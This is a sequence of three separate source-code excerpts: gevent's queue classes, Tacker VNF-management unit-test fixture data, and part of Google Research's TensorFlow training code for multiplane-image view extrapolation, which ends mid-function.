heappush(self.queue, item)
def _get(self, heappop=heapq.heappop):
return heappop(self.queue)
class LifoQueue(Queue):
'''A subclass of :class:`Queue` that retrieves most recently added entries first.'''
def _init(self, maxsize):
self.queue = []
def _put(self, item):
self.queue.append(item)
def _get(self):
return self.queue.pop()
class JoinableQueue(Queue):
'''A subclass of :class:`Queue` that additionally has :meth:`task_done` and :meth:`join` methods.'''
def __init__(self, maxsize=None):
from gevent.event import Event
Queue.__init__(self, maxsize)
self.unfinished_tasks = 0
self._cond = Event()
self._cond.set()
def _format(self):
result = Queue._format(self)
if self.unfinished_tasks:
result += ' tasks=%s _cond=%s' % (self.unfinished_tasks, self._cond)
return result
def _put(self, item):
Queue._put(self, item)
self.unfinished_tasks += 1
self._cond.clear()
def task_done(self):
'''Indicate that a formerly enqueued task is complete. Used by queue consumer threads.
For each :meth:`get <Queue.get>` used to fetch a task, a subsequent call to :meth:`task_done` tells the queue
that the processing on the task is complete.
If a :meth:`join` is currently blocking, it will resume when all items have been processed
(meaning that a :meth:`task_done` call was received for every item that had been
:meth:`put <Queue.put>` into the queue).
Raises a :exc:`ValueError` if called more times than there were items placed in the queue.
'''
if self.unfinished_tasks <= 0:
raise ValueError('task_done() called too many times')
self.unfinished_tasks -= 1
if self.unfinished_tasks == 0:
self._cond.set()
def join(self):
'''Block until all items in the queue have been gotten and processed.
The count of unfinished tasks goes up whenever an item is added to the queue.
The count goes down whenever a consumer thread calls :meth:`task_done` to indicate
that the item was retrieved and all work on it is complete. When the count of
unfinished tasks drops to zero, :meth:`join` unblocks.
'''
self._cond.wait()
| |
# Copyright (C) 2019 NTT DATA
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import datetime
import iso8601
from tacker.db.db_sqlalchemy import models
from tacker.tests import constants
from tacker.tests import uuidsentinel
vnf_package_data = {'algorithm': None, 'hash': None,
'location_glance_store': None,
'onboarding_state': 'CREATED',
'operational_state': 'DISABLED',
'tenant_id': uuidsentinel.tenant_id,
'usage_state': 'NOT_IN_USE',
'user_data': {'abc': 'xyz'},
'created_at': datetime.datetime(
2019, 8, 8, 0, 0, 0, tzinfo=iso8601.UTC),
'deleted': False,
'size': 0
}
software_image = {
'software_image_id': uuidsentinel.software_image_id,
'name': 'test', 'provider': 'test', 'version': 'test',
'algorithm': 'sha-256',
'hash': 'b9c3036539fd7a5f87a1bf38eb05fdde8b556a1'
'a7e664dbeda90ed3cd74b4f9d',
'container_format': 'test', 'disk_format': 'qcow2', 'min_disk': 1,
'min_ram': 2, 'size': 1, 'image_path': 'test',
'metadata': {'key1': 'value1'}
}
artifact_data = {
'file_name': 'test', 'type': 'test',
'algorithm': 'sha-256',
'hash': 'b9c3036539fd7a5f87a1bf38eb05fdde8b556a1'
'a7e664dbeda90ed3cd74b4f9d',
'metadata': {'key1': 'value1'}
}
artifacts = {
'json_data': 'test data',
'type': 'tosca.artifacts.nfv.SwImage',
'algorithm': 'sha512', 'hash': uuidsentinel.hash}
filter = {
"usageState": ["NOT_IN_USE"],
"vnfPkgId": ["f04857cb-abdc-405f-8254-01501f3fa059"],
"vnfdId": ["b1bb0ce7-5555-0001-95ed-4840d70a1209"],
"vnfInstanceSubscriptionFilter": {"vnfdIds": []},
"vnfProductsFromProviders": [
{
"vnfProvider": "xxxxx",
"vnfProducts": [
{
"vnfProductName": "artifactVNF",
"versions": [
{
"vnfSoftwareVersion": "1.0",
"vnfdVersions": ["v2.2"]
}
]
}
]
},
{
"vnfProvider": "xxxxx",
"vnfProducts": [
{
"vnfProductName": "artifactVNF",
"versions": [
{
"vnfSoftwareVersion": "1.0",
"vnfdVersions": ["v2.2"]
}
]
}
]
}
],
"notificationTypes": ["VnfLcmOperationOccurrenceNotification"],
"operationalState": ["ENABLED"],
"tenant_id": uuidsentinel.tenant_id
}
subscription_data = {
'id': "c3e5ea85-8e3d-42df-a636-3b7857cbd7f9",
'callback_uri': "fake_url",
'created_at': "2020-06-11 09:39:58",
'tenant_id': uuidsentinel.tenant_id
}
vnfd_data = {
"tenant_id": uuidsentinel.tenant_id,
'name': 'test',
'description': 'test_description',
'mgmt_driver': 'test_mgmt_driver'
}
vnfd_attribute = {
'key': 'test_key',
'value': 'test_value',
}
lcm_op_occs_data = {
"tenant_id": uuidsentinel.tenant_id,
'operation_state': 'PROCESSING',
'state_entered_time': datetime.datetime(1900, 1, 1, 1, 1, 1,
tzinfo=iso8601.UTC),
'start_time': datetime.datetime(1900, 1, 1, 1, 1, 1,
tzinfo=iso8601.UTC),
'operation': 'MODIFY_INFO',
'is_automatic_invocation': 0,
'is_cancel_pending': 0,
}
vim_data = {
'id': uuidsentinel.vim_id,
'type': 'test_type',
"tenant_id": uuidsentinel.tenant_id,
'name': "test_name",
'description': "test_description",
'placement_attr': "test_placement_attr",
'shared': 0,
'status': "REACHABLE",
'is_default': 0
}
fake_vnf_package_response = copy.deepcopy(vnf_package_data)
fake_vnf_package_response.pop('user_data')
fake_vnf_package_response.update({'id': uuidsentinel.package_uuid})
vnf_deployment_flavour = {'flavour_id': 'simple',
'flavour_description': 'simple flavour description',
'instantiation_levels': {
'levels': {
'instantiation_level_1': {
'description': 'Smallest size',
'scale_info': {
'worker_instance': {
'scale_level': 0
}
}
},
'instantiation_level_2': {
'description': 'Largest size',
'scale_info': {
'worker_instance': {
'scale_level': 2
}
}
}
},
'default_level': 'instantiation_level_1'
},
'created_at': datetime.datetime(
2019, 8, 8, 0, 0, 0, tzinfo=iso8601.UTC),
}
vnf_artifacts = {
'artifact_path': 'scripts/install.sh',
'_metadata': {},
'algorithm': 'sha-256',
'hash': 'd0e7828293355a07c2dccaaa765c80b507e60e6167067c950dc2e6b0da0dbd8b',
'created_at': datetime.datetime(2020, 6, 29, 0, 0, 0, tzinfo=iso8601.UTC),
}
def fake_vnf_package_vnfd_dict(**updates):
vnf_pkg_vnfd = {
'package_uuid': uuidsentinel.package_uuid,
'vnfd_id': uuidsentinel.vnfd_id,
'vnf_provider': 'test vnf provider',
'vnf_product_name': 'Sample VNF',
'vnf_software_version': '1.0',
'vnfd_version': '1.0'
}
if updates:
vnf_pkg_vnfd.update(updates)
return vnf_pkg_vnfd
def return_vnf_package_vnfd_data():
model_obj = models.VnfPackageVnfd()
model_obj.update(fake_vnf_package_vnfd_dict())
return model_obj
def get_vnf_package_vnfd_data(vnf_package_id, vnfd_id):
return {
'package_uuid': vnf_package_id,
'vnfd_id': vnfd_id,
'vnf_provider': 'test vnf provider',
'vnf_product_name': 'Sample VNF',
'vnf_software_version': '1.0',
"vnf_pkg_id": uuidsentinel.vnf_pkg_id,
'vnfd_version': '1.0',
}
def get_vnf_instance_data(vnfd_id):
return {
"vnf_software_version": "1.0",
"vnf_product_name": "Sample VNF",
"vnf_instance_name": 'Sample VNF Instance',
"vnf_instance_description": 'Sample vnf_instance_description',
"instantiation_state": "NOT_INSTANTIATED",
"vnf_provider": "test vnf provider",
"vnfd_id": vnfd_id,
"vnfd_version": "1.0",
"tenant_id": uuidsentinel.tenant_id,
"vnf_pkg_id": uuidsentinel.vnf_pkg_id,
"vnf_metadata": {"key": "value"},
}
def get_vnf_instance_data_with_id(vnfd_id):
return {
"id": uuidsentinel.tenant_id,
"vnf_software_version": "1.0",
"vnf_product_name": "Sample VNF",
"vnf_instance_name": 'Sample VNF Instance',
"vnf_instance_description": 'Sample vnf_instance_description',
"instantiation_state": "NOT_INSTANTIATED",
"vnf_provider": "test vnf provider",
"vnfd_id": vnfd_id,
"vnfd_version": "1.0",
"tenant_id": uuidsentinel.tenant_id,
"vnf_pkg_id": uuidsentinel.vnf_pkg_id,
"vnf_metadata": {"key": "value"},
}
def get_lcm_op_occs_data(id, vnf_instance_id):
return {
"id": id,
"tenant_id": uuidsentinel.tenant_id,
'operation_state': 'PROCESSING',
'state_entered_time': datetime.datetime(1900, 1, 1, 1, 1, 1,
tzinfo=iso8601.UTC),
'start_time': datetime.datetime(1900, 1, 1, 1, 1, 1,
tzinfo=iso8601.UTC),
'vnf_instance_id': vnf_instance_id,
'operation': 'MODIFY_INFO',
'is_automatic_invocation': 0,
'is_cancel_pending': 0,
}
def fake_vnf_instance_model_dict(**updates):
vnf_instance = {
'deleted': False,
'deleted_at': None,
'updated_at': None,
'created_at': datetime.datetime(1900, 1, 1, 1, 1, 1,
tzinfo=iso8601.UTC),
'vnf_product_name': 'Sample VNF',
'vnf_instance_name': 'Sample VNF',
'vnf_instance_description': None,
'vnf_provider': 'test vnf provider',
'vnf_software_version': '1.0',
'vnfd_id': uuidsentinel.vnfd_id,
'vnfd_version': '1.0',
'instantiation_state': 'NOT_INSTANTIATED',
'vim_connection_info': [],
'tenant_id': '33f8dbdae36142eebf214c1869eb4e4c',
'vnf_pkg_id': uuidsentinel.vnf_pkg_id,
'id': constants.UUID,
'vnf_metadata': {"key": "value"},
}
if updates:
vnf_instance.update(updates)
return vnf_instance
def fake_vnf_resource_data(instance_id):
return {
'vnf_instance_id': instance_id,
'resource_name': "test",
'resource_type': "image",
'resource_identifier': uuidsentinel.image_id,
'resource_status': "status",
'tenant_id': uuidsentinel.tenant_id
}
def vnf_pack_vnfd_data(vnf_pack_id):
return {
'package_uuid': vnf_pack_id,
'vnfd_id': uuidsentinel.vnfd_id,
'vnf_provider': 'test_provider',
'vnf_product_name': 'test_product_name',
'vnf_software_version': 'test_version',
'vnfd_version': 'test_vnfd_version',
}
def vnf_pack_artifact_data(vnf_pack_id):
return {
'package_uuid': vnf_pack_id,
'artifact_path': 'scripts/install.sh',
'algorithm': 'sha-256',
'hash': 'd0e7828293355a07c2dccaaa765c80b507e'
'60e6167067c950dc2e6b0da0dbd8b',
'_metadata': {}
}
ip_address = [{
'type': 'IPV4',
'is_dynamic': True
}]
ip_over_ethernet_address_info = {
'mac_address': 'fake_mac',
'ip_addresses': ip_address,
}
cp_protocol_info = {
'layer_protocol': 'IP_OVER_ETHERNET',
'ip_over_ethernet': ip_over_ethernet_address_info,
}
vnf_external_cp_info = {
'id': uuidsentinel.external_cp_id,
'cpd_id': uuidsentinel.cpd_id,
'ext_link_port_id': uuidsentinel.ext_link_port_id
}
resource_handle_info = {
'resource_id': uuidsentinel.resource_id,
'vim_level_resource_type': 'TEST'
}
ext_link_port_info = {
'id': uuidsentinel.ext_link_port_id,
'resource_handle': resource_handle_info,
'cp_instance_id': uuidsentinel.cp_instance_id,
}
ext_virtual_link_info = {
'id': uuidsentinel.virtual_link_id,
'resource_handle': resource_handle_info,
'ext_link_ports': [ext_link_port_info],
}
vnf_link_ports = {
'id': uuidsentinel.vnf_link_ports_id,
'resource_handle': resource_handle_info,
'cp_instance_id': uuidsentinel.cp_instance_id
}
ext_managed_virtual_link_info = {
'id': uuidsentinel.ext_managed_virtual_link_id,
'vnf_virtual_link_desc_id': uuidsentinel.vnf_virtual_link_desc_id,
'network_resource': resource_handle_info,
'vnf_link_ports': [vnf_link_ports],
}
vnfc_resource_info = {
'id': uuidsentinel.resource_info_id,
'vdu_id': 'vdu1',
'compute_resource': None,
'storage_resource_ids': [uuidsentinel.id1, uuidsentinel.id2],
'reservation_id': uuidsentinel.reservation_id,
'vnfc_cp_info': None,
'metadata': {'key': 'value'}
}
vnfc_cp_info = {
'id': uuidsentinel.cp_instance_id,
'cpd_id': uuidsentinel.cpd_id,
'vnf_ext_cp_id': uuidsentinel.vnf_ext_cp_id,
'cp_protocol_info': [cp_protocol_info],
'vnf_link_port_id': uuidsentinel.vnf_link_port_id,
}
vnfc_resource_info = {
'id': uuidsentinel.resource_info_id,
'vdu_id': uuidsentinel.vdu_id,
'compute_resource': resource_handle_info,
'storage_resource_ids': [uuidsentinel.id1, uuidsentinel.id2],
'reservation_id': uuidsentinel.reservation_id,
'vnfc_cp_info': [vnfc_cp_info],
'metadata': {'key': 'value'}
}
ip_address_info = {
'type': 'IPV4',
'subnet_id': uuidsentinel.subnet_id,
'is_dynamic': False,
'addresses': ['10.10.1', '10.10.2'],
}
vnf_virtual_link_resource_info = {
'id': uuidsentinel.virtual_link_resource_id,
'vnf_virtual_link_desc_id': uuidsentinel.vnf_virtual_link_desc_id,
'network_resource': resource_handle_info,
'vnf_link_ports': vnf_link_ports,
}
virtual_storage_resource_info = {
'id': uuidsentinel.virtual_storage_resource_id,
'virtual_storage_desc_id': uuidsentinel.virtual_storage_desc_id,
'storage_resource': resource_handle_info,
}
vnf_ext_cp_info = {
'id': uuidsentinel.id,
'cpd_id': 'CP1',
'cp_protocol_info': [cp_protocol_info],
'associated_vnfc_cp_id': uuidsentinel.associated_vnfc_cp_id
}
def get_instantiated_vnf_info():
instantiated_vnf_info = {
'flavour_id': uuidsentinel.flavour_id,
'vnf_state': 'STARTED',
'instance_id': uuidsentinel.instance_id
}
return instantiated_vnf_info
instantiated_vnf_info = {
'ext_cp_info': [vnf_ext_cp_info],
'flavour_id': uuidsentinel.flavour_id,
'vnf_state': 'STARTED',
'vnf_instance_id': uuidsentinel.vnf_instance_id
}
def vnf_resource_model_object(vnf_resource):
resource_dict = {
'id': vnf_resource.id,
'vnf_instance_id': vnf_resource.vnf_instance_id,
'resource_name': vnf_resource.resource_name,
'resource_type': vnf_resource.resource_type,
'resource_identifier': vnf_resource.resource_identifier,
'resource_status': vnf_resource.resource_status
}
vnf_resource_db_obj = models.VnfResource()
vnf_resource_db_obj.update(resource_dict)
return vnf_resource_db_obj
def vnf_instance_model_object(vnf_instance):
instance_dict = {
'id': vnf_instance.id,
'vnf_instance_name': vnf_instance.vnf_instance_name,
'vnf_instance_description': vnf_instance.vnf_instance_description,
'instantiation_state': vnf_instance.instantiation_state,
'task_state': vnf_instance.task_state,
'vnfd_id': vnf_instance.vnfd_id,
'vnf_provider': vnf_instance.vnf_provider,
'vnf_product_name': vnf_instance.vnf_product_name,
'vnf_software_version': vnf_instance.vnf_software_version,
'vnfd_version': vnf_instance.vnfd_version,
'vim_connection_info': vnf_instance.vim_connection_info,
'tenant_id': vnf_instance.tenant_id,
'created_at': vnf_instance.created_at,
'vnf_pkg_id': vnf_instance.vnf_pkg_id,
'vnf_metadata': vnf_instance.vnf_metadata,
}
vnf_instance_db_obj = models.VnfInstance()
vnf_instance_db_obj.update(instance_dict)
return vnf_instance_db_obj
def get_changed_info_data():
return {
"vnf_instance_name": "",
"vnf_instance_description": "",
"metadata": {"test:": "test_value"},
"vnf_configurable_properties": {"test": "test_value"},
"vnfc_info_modifications_delete_ids": ["test1"],
"vnfd_id": "2c69a161-0000-4b0f-bcf8-391f8fc76600",
"vnf_provider": "NEC",
"vnf_product_name": "MME",
"vnf_software_version": "1.0",
"vnfd_version": "MME_1.0"
}
def get_vnf(vnfd_id, vim_id):
return {
'tenant_id': uuidsentinel.tenant_id,
'name': "test_name",
'vnfd_id': vnfd_id,
'mgmt_ip_address': "test_mgmt_ip_address",
'status': "ACTIVE",
'description': "test_description",
'placement_attr': "test_placement_attr",
'vim_id': vim_id
}
def get_changed_ext_conn_data():
return [{
"id": uuidsentinel.change_ext_conn_id,
"resource_handle": {
"vim_connection_id": uuidsentinel.vim_connection_id,
"resource_id": uuidsentinel.vl_resource_id,
"vim_level_resource_type": "OS::Neutron::Net",
},
"ext_link_ports": [{
"id": uuidsentinel.ext_link_ports_id,
"resource_handle": {
"vim_connection_id": uuidsentinel.vim_connection_id,
"resource_id": uuidsentinel.port_resource_id,
"vim_level_resource_type": "OS::Neutron::Port",
},
"cp_instance_id": uuidsentinel.cp_instance_id,
}]
}]
| |
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Functions for learning to predict multiplane images (MPI).
For CVPR 2019 paper:
Pushing the Boundaries of View Extrapolation with Multiplane Images
Pratul P. Srinivasan, Richard Tucker, Jonathan T. Barron, Ravi Ramamoorthi, Ren
Ng, Noah Snavely
Modified from code written by Tinghui Zhou
(https://github.com/google/stereo-magnification).
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import time
import numpy as np
import tensorflow.compat.v1 as tf
import mpi_extrapolation.geometry.projector as pj
from mpi_extrapolation.nets import build_vgg19
from mpi_extrapolation.nets import ed_3d_net
from mpi_extrapolation.nets import refine_net
class MPI(object):
"""Class definition for MPI learning module.
"""
def __init__(self):
pass
def infer_mpi(self, raw_src_images, raw_ref_image, ref_pose, src_poses,
intrinsics, num_mpi_planes, mpi_planes,
run_patched=False,
patch_ind=np.array([0, 0]),
patchsize=np.array([256, 256]),
outsize=np.array([128, 128])):
"""Construct the MPI inference graph.
Args:
raw_src_images: stack of source images [batch, height, width, 3*#source]
raw_ref_image: reference image [batch, height, width, 3]
ref_pose: reference frame pose (world to camera) [batch, 4, 4]
src_poses: source frame poses (world to camera) [batch, #source, 4, 4]
intrinsics: camera intrinsics [batch, 3, 3]
num_mpi_planes: number of mpi planes to predict
mpi_planes: list of plane depths
run_patched: whether to only infer MPI for patches of PSV (inference only)
patch_ind: patch index for infer MPI inference
patchsize: spatial patch size for MPI inference
outsize: size of central portion to keep for patched inference
Returns:
outputs: a collection of output tensors.
"""
with tf.name_scope("preprocessing"):
src_images = self.preprocess_image(raw_src_images)
ref_image = self.preprocess_image(raw_ref_image)
with tf.name_scope("format_network_input"):
# WARNING: we assume the first src image/pose is the reference
net_input = self.format_network_input(ref_image, src_images[:, :, :, 3:],
ref_pose, src_poses[:, 1:],
mpi_planes, intrinsics)
with tf.name_scope("layer_prediction"):
# The network directly outputs the color image at each MPI plane.
chout = 4 # Number of output channels, RGBA
if run_patched:
# Patch the PSV spatially, with buffer, and generate MPI patch
# Only for inference (not implemented for training)
buffersize = (patchsize - outsize) // 2
padding = [[0, 0], [buffersize[0], buffersize[0]],
[buffersize[1], buffersize[1]], [0, 0], [0, 0]]
net_input_pad = tf.pad(net_input, padding)
patch_start = patch_ind * outsize
patch_end = patch_start + patchsize
net_input_patch = net_input_pad[:, patch_start[0]:patch_end[0],
patch_start[1]:patch_end[1], :, :]
rgba_layers, _ = ed_3d_net(net_input_patch, chout)
else:
# Generate entire MPI (training and inference, but takes more memory)
print("first step MPI prediction")
rgba_layers, _ = ed_3d_net(net_input, chout)
color_layers = rgba_layers[:, :, :, :, :-1]
alpha_layers = rgba_layers[:, :, :, :, -1:]
# Rescale alphas to (0, 1)
alpha_layers = (alpha_layers + 1.)/2.
rgba_layers = tf.concat([color_layers, alpha_layers], axis=4)
print("refining MPI")
transmittance = self.compute_transmittance(alpha_layers)
refine_input_colors = color_layers * transmittance
refine_input_alpha = alpha_layers * transmittance
stuff_behind = tf.cumsum(refine_input_colors, axis=3)
concat_trans = True # Concatenate transmittance to second input
if concat_trans:
refine_input = tf.concat([tf.stop_gradient(refine_input_colors),
tf.stop_gradient(stuff_behind),
tf.stop_gradient(refine_input_alpha),
tf.stop_gradient(transmittance)], axis=4)
normalized_disp_inds = tf.reshape(tf.linspace(0.0, 1.0, num_mpi_planes),
[1, 1, 1, num_mpi_planes, 1])
sh = tf.shape(refine_input)
normalized_disp_inds_stack = tf.tile(normalized_disp_inds,
[1, sh[1], sh[2], 1, 1])
refine_input = tf.concat([refine_input, normalized_disp_inds_stack],
axis=4)
print("refine input size:", refine_input.shape)
rgba_layers_refine = refine_net(refine_input)
print("predicting flow for occlusions")
flow_source = tf.stop_gradient(stuff_behind)
flow_vecs = rgba_layers_refine[:, :, :, :, :2]
color_layers = pj.flow_gather(flow_source, flow_vecs)
alpha_layers = rgba_layers_refine[:, :, :, :, -1:]
# Rescale alphas to (0, 1)
alpha_layers = (alpha_layers + 1.)/2.
rgba_layers_refine = tf.concat([color_layers, alpha_layers], axis=4)
# Collect output tensors
pred = {}
pred["rgba_layers"] = rgba_layers
pred["rgba_layers_refine"] = rgba_layers_refine
pred["refine_input_mpi"] = tf.concat([refine_input_colors,
refine_input_alpha], axis=-1)
pred["stuff_behind"] = stuff_behind
pred["flow_vecs"] = flow_vecs
pred["psv"] = net_input[:, :, :, :, 0:3]
# Add pred tensors to outputs collection
print("adding outputs to collection")
for i in pred:
tf.add_to_collection("outputs", pred[i])
return pred
def mpi_render_view(self, input_mpi, tgt_pose, planes, intrinsics):
"""Render a target view from MPI representation.
Args:
input_mpi: input MPI [batch, height, width, #planes, 4]
tgt_pose: target pose (relative) to render from [batch, 4, 4]
planes: list of depth for each plane
intrinsics: camera intrinsics [batch, 3, 3]
Returns:
rendered view [batch, height, width, 3]
"""
batch_size, _, _ = tgt_pose.get_shape().as_list()
rgba_layers = input_mpi
# Format for homography code
depths = tf.tile(planes[:, tf.newaxis], [1, batch_size])
rgba_layers = tf.transpose(rgba_layers, [3, 0, 1, 2, 4])
# Render target viewpoint
proj_images = pj.projective_forward_homography(
rgba_layers, intrinsics, tgt_pose, depths)
proj_images = tf.transpose(proj_images, [1, 2, 3, 0, 4])
output_image = pj.over_composite(proj_images)
output_image.set_shape([None, None, None, 3])
return output_image, proj_images
def build_train_graph(self,
inputs,
min_depth,
max_depth,
num_mpi_planes,
learning_rate=0.0002,
beta1=0.9,
vgg_model_file=None,
global_step=0):
"""Construct the training computation graph.
Args:
inputs: dictionary of tensors (see 'input_data' below) needed for training
min_depth: minimum depth for the PSV and MPI planes
max_depth: maximum depth for the PSV and MPI planes
num_mpi_planes: number of MPI planes to infer
learning_rate: learning rate
beta1: hyperparameter for Adam
vgg_model_file: path to vgg weights (needed when vgg loss is used)
global_step: current optimization step
Returns:
A train_op to be used for training.
"""
print("starting to build graph")
with tf.name_scope("input_size_randomization"):
dim_choices = tf.constant([[1, 16], [2, 32], [4, 32], [4, 64], [4, 128],
[8, 32], [8, 64], [8, 128]],
dtype=tf.int32)
rand_dim = tf.random_shuffle(dim_choices)[0, :]
height_div = rand_dim[0]
width_div = rand_dim[0]
num_mpi_planes = rand_dim[1]
tf.summary.scalar("num_mpi_planes", num_mpi_planes)
with tf.name_scope("setup"):
mpi_planes = self.inv_depths(min_depth, max_depth, num_mpi_planes)
with tf.name_scope("input_data"):
raw_tgt_image = inputs["tgt_image"]
raw_ref_image = inputs["ref_image"]
raw_src_images = inputs["src_images"]
_, img_height, img_width, _ = raw_src_images.get_shape().as_list(
)
img_height = img_height // height_div
img_width = img_width // width_div
raw_tgt_image = tf.image.convert_image_dtype(
raw_tgt_image, dtype=tf.float32)
raw_ref_image = tf.image.convert_image_dtype(
raw_ref_image, dtype=tf.float32)
raw_src_images = tf.image.convert_image_dtype(
raw_src_images, dtype=tf.float32)
raw_tgt_image = tf.image.resize_area(raw_tgt_image,
[img_height, img_width])
raw_ref_image = tf.image.resize_area(raw_ref_image,
[img_height, img_width])
raw_src_images = tf.image.resize_area(raw_src_images,
[img_height, img_width])
tgt_pose = inputs["tgt_pose"]
ref_pose = inputs["ref_pose"]
src_poses = inputs["src_poses"]
intrinsics = inputs["intrinsics"]
# Scale intrinsics based on size randomization
intrinsics = tf.concat([
intrinsics[:, 0:1, :] / tf.to_float(width_div),
intrinsics[:, 1:2, :] / tf.to_float(height_div), intrinsics[:, 2:3, :]
],
axis=1)
inputs["intrinsics"] = intrinsics
_, num_source, _, _ = src_poses.get_shape().as_list()
with tf.name_scope("inference"):
print("setting up MPI inference")
num_mpi_planes = tf.shape(mpi_planes)[0]
pred = self.infer_mpi(raw_src_images, raw_ref_image, ref_pose, src_poses,
intrinsics, num_mpi_planes,
mpi_planes)
rgba_layers = pred["rgba_layers"]
rgba_layers_refine = pred["rgba_layers_refine"]
stuff_behind = pred["stuff_behind"]
refine_input_mpi = pred["refine_input_mpi"]
psv = pred["psv"]
with tf.name_scope("synthesis"):
print("setting up rendering")
rel_pose = tf.matmul(tgt_pose, tf.matrix_inverse(ref_pose))
output_image, output_layers = self.mpi_render_view(
rgba_layers, rel_pose, mpi_planes, intrinsics)
output_alpha = output_layers[Ellipsis, -1]
output_image_refine, _ = self.mpi_render_view(
rgba_layers_refine, rel_pose, mpi_planes, intrinsics)
with tf.name_scope("loss"):
print("computing losses")
# Mask loss for pixels outside reference frustum
loss_mask = tf.where(
tf.equal(
tf.reduce_min(
tf.abs(tf.reduce_sum(output_layers, axis=-1)),
axis=3,
keep_dims=True), 0.0),
tf.zeros_like(output_alpha[:, :, :, 0:1]),
tf.ones_like(output_alpha[:, :, :, 0:1]))
loss_mask = tf.stop_gradient(loss_mask)
tf.summary.image("loss_mask", loss_mask)
# Helper functions for loss
def compute_error(real, fake, mask):
return tf.reduce_mean(mask * tf.abs(fake - real))
# Normalized VGG loss (from
# https://github.com/CQFIO/PhotographicImageSynthesis)
downsample = lambda tensor, ds: tf.nn.avg_pool(tensor, [1, ds, ds, 1],
[1, ds, ds, 1], "SAME")
def vgg_loss(raw_tgt_image, output_image, loss_mask):
"""Compute VGG loss."""
vgg_real = build_vgg19(raw_tgt_image * 255.0, vgg_model_file)
rescaled_output_image = (output_image + 1.)/2. * 255.0
vgg_fake = build_vgg19(
rescaled_output_image, vgg_model_file, reuse=True)
p0 = compute_error(vgg_real["input"], vgg_fake["input"], loss_mask)
p1 = compute_error(vgg_real["conv1_2"],
vgg_fake["conv1_2"],
loss_mask)/2.6
p2 = compute_error(vgg_real["conv2_2"],
vgg_fake["conv2_2"],
downsample(loss_mask, 2))/4.8
p3 = compute_error(vgg_real["conv3_2"],
vgg_fake["conv3_2"],
downsample(loss_mask, 4))/3.7
p4 = compute_error(vgg_real["conv4_2"],
vgg_fake["conv4_2"],
downsample(loss_mask, 8))/5.6
p5 = compute_error(vgg_real["conv5_2"],
vgg_fake["conv5_2"],
downsample(loss_mask, 16))*10/1.5
total_loss = p0+p1+p2+p3+p4+p5
return total_loss, vgg_real, vgg_fake
vgg_loss_initial, _, _ = vgg_loss(raw_tgt_image, output_image, loss_mask)
tf.summary.scalar("vgg_loss_initial", vgg_loss_initial)
total_loss = vgg_loss_initial
vgg_loss_refine, _, _ = vgg_loss(raw_tgt_image, output_image_refine,
loss_mask)
tf.summary.scalar("vgg_loss_refine", vgg_loss_refine)
total_loss += vgg_loss_refine
with tf.name_scope("train_op"):
print("setting up train op")
train_vars = [var for var in tf.trainable_variables()]
optim = tf.train.AdamOptimizer(learning_rate, beta1)
grads_and_vars = optim.compute_gradients(total_loss, var_list=train_vars)
train_op = [optim.apply_gradients(grads_and_vars)]
# Summaries
tf.summary.scalar("total_loss", total_loss)
# Source images
for i in range(num_source):
src_image = raw_src_images[:, :, :, i*3:(i+1)*3]
tf.summary.image("src_image_%d" % i, src_image)
# Output image
tf.summary.image("output_image", self.deprocess_image(output_image))
# Refined output image
tf.summary.image("output_image_refine",
self.deprocess_image(output_image_refine))
# Target image
tf.summary.image("tgt_image", raw_tgt_image)
# Ref image
tf.summary.image("ref_image", raw_ref_image)
# Predicted color and alpha layers, and PSV
num_summ = 16 # Number of plane summaries to show in tensorboard
for i in range(num_summ):
ind = tf.to_int32(i * num_mpi_planes/num_summ)
rgb = rgba_layers[:, :, :, ind, :3]
alpha = rgba_layers[:, :, :, ind, -1:]
ref_plane = psv[:, :, :, ind, 3:6]
source_plane = psv[:, :, :, ind, :3]
output_rgb = output_layers[:, :, :, ind, :3]
tf.summary.image("rgb_layer_%d" % i, self.deprocess_image(rgb))
tf.summary.image("alpha_layer_%d" % i, alpha)
tf.summary.image("rgba_layer_%d" % i, self.deprocess_image(rgb * alpha))
tf.summary.image("psv_avg_%d" % i,
(self.deprocess_image(0.5*ref_plane + 0.5*source_plane)))
tf.summary.image("output_rgb_%d" % i,
self.deprocess_image(output_rgb))
tf.summary.image("psv_ref_%d" % i, self.deprocess_image(ref_plane))
tf.summary.image("psv_source_%d" % i, self.deprocess_image(source_plane))
# Cumulative rendered images and refined MPI
for i in range(num_summ):
ind = tf.to_int32(i * num_mpi_planes/num_summ)
rgb = rgba_layers_refine[:, :, :, ind, :3]
alpha = rgba_layers_refine[:, :, :, ind, 3:]
render = stuff_behind[:, :, :, ind, :3]
input_colors = refine_input_mpi[:, :, :, ind, :3]
tf.summary.image("rgb_layer_refine_%d" % i, self.deprocess_image(rgb))
tf.summary.image("alpha_layer_refine_%d" % i, alpha)
tf.summary.image("rgba_layer_refine_%d" % i,
self.deprocess_image(rgb * alpha))
tf.summary.image("cumulative_render_%d" % i, self.deprocess_image(render))
tf.summary.image("input_colors_refine_%d" % i,
self.deprocess_image(input_colors))
return train_op
def train(self, train_op, load_dir, checkpoint_dir, summary_dir,
continue_train, summary_freq, save_latest_freq, max_steps,
global_step):
"""Runs the training procedure.
Args:
train_op: op for training the network
load_dir: where to load pretrained model
checkpoint_dir: where to save the model checkpoints
summary_dir: where to save the tensorboard summaries
continue_train: whether to restore training from previous checkpoint
summary_freq: summary frequency
save_latest_freq: Frequency of model saving
max_steps: maximum training steps
global_step: tf Variable for current optimization step
"""
# parameter_count = tf.reduce_sum(
# [tf.reduce_prod(tf.shape(v)) for v in tf.trainable_variables()])
incr_global_step = tf.assign(global_step, global_step + 1)
saver = tf.train.Saver([var for var in tf.trainable_variables()] +
[global_step],
max_to_keep=None)
sv = tf.train.Supervisor(logdir=summary_dir, save_summaries_secs=0,
saver=None)
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
